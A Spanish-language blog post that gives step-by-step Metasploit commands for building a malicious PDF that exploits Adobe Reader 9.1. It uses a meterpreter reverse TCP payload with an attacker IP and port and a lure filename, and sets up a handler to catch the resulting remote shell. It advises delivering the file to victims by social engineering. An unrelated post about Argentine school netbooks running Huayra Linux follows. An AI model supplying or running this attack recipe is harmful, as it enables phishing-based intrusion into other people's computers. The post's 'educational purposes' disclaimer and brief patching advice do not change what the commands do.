domingo, 28 de octubre de 2012

Explotando Adobe PDF

Bueno, estaba aburrido y me puse a jugar un rato con el Metasploit, y salio esto que dar resultado:


REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante) yo lo hice con R3
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Adobe Reader 9.1 (Victima)


PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf (Creara el archivo PDF malicioso)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 8080 (Puerto open de la Victima)
exploit




Después de haber creado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso creado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:


use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lport 8080 
set lhost 192.168.1.17  
exploit


Cuando la victima (osea yo) ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:

Después de que la victima (yo jajaja) hice clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:


Y listo! Me  "vulnere " mi sistema o puede ser otro

CONCLUSIÓN: 

Después de haber realizado con éxito este ataque, se puede migrar el proceso explorer.exe en nuestra victima.

La versión vulnerable de este ataque es el Adobe Acrobat 9.1, por lo tanto si no queremos ser victima de dicho ataque, les recomiendo actualizar a una versión mayor.

El explicativo es solo con fines EDUCATIVOS, cualquier uso malintencionado que le den es responsabilidad entera de cada uno.








CONECTAR IGUALDAD NUEVO FORMATO

En el 2013 las netbooks de conectar igualdad no solo traerán Huayra, sino que tambien traerán Window$ 7, lo único que cambia es el orden de booteo, esta vez traerán bootenado por defecto Huayra. No soy adepto al software privativo pero, es una realidad que se usa y mucho y la mayoria de la gente aprende computación con este tipo de software, por ahora..., y los chicos que nunca iban a poder tener una computadora en su vida y solo las veían en los cibers, van a tener una oportunidad de aprender informática privativa que se usa en muchas partes. Lo bueno seria que aprendieran a usar el Huayra y conozcan el mundo LINUX para que estén mejor preparados para su futuro. Es también cierto que los docentes solo manejan window$, seria bueno que lo capaciten con LINUX y que el país como GOBIERNO DE TODOS y PARA TODOS (jajajaja) pueda implementar el SOFTWARE LIBRE en la Administración Publica. Les paso algunas imágenes de HUAYRA






Busquedas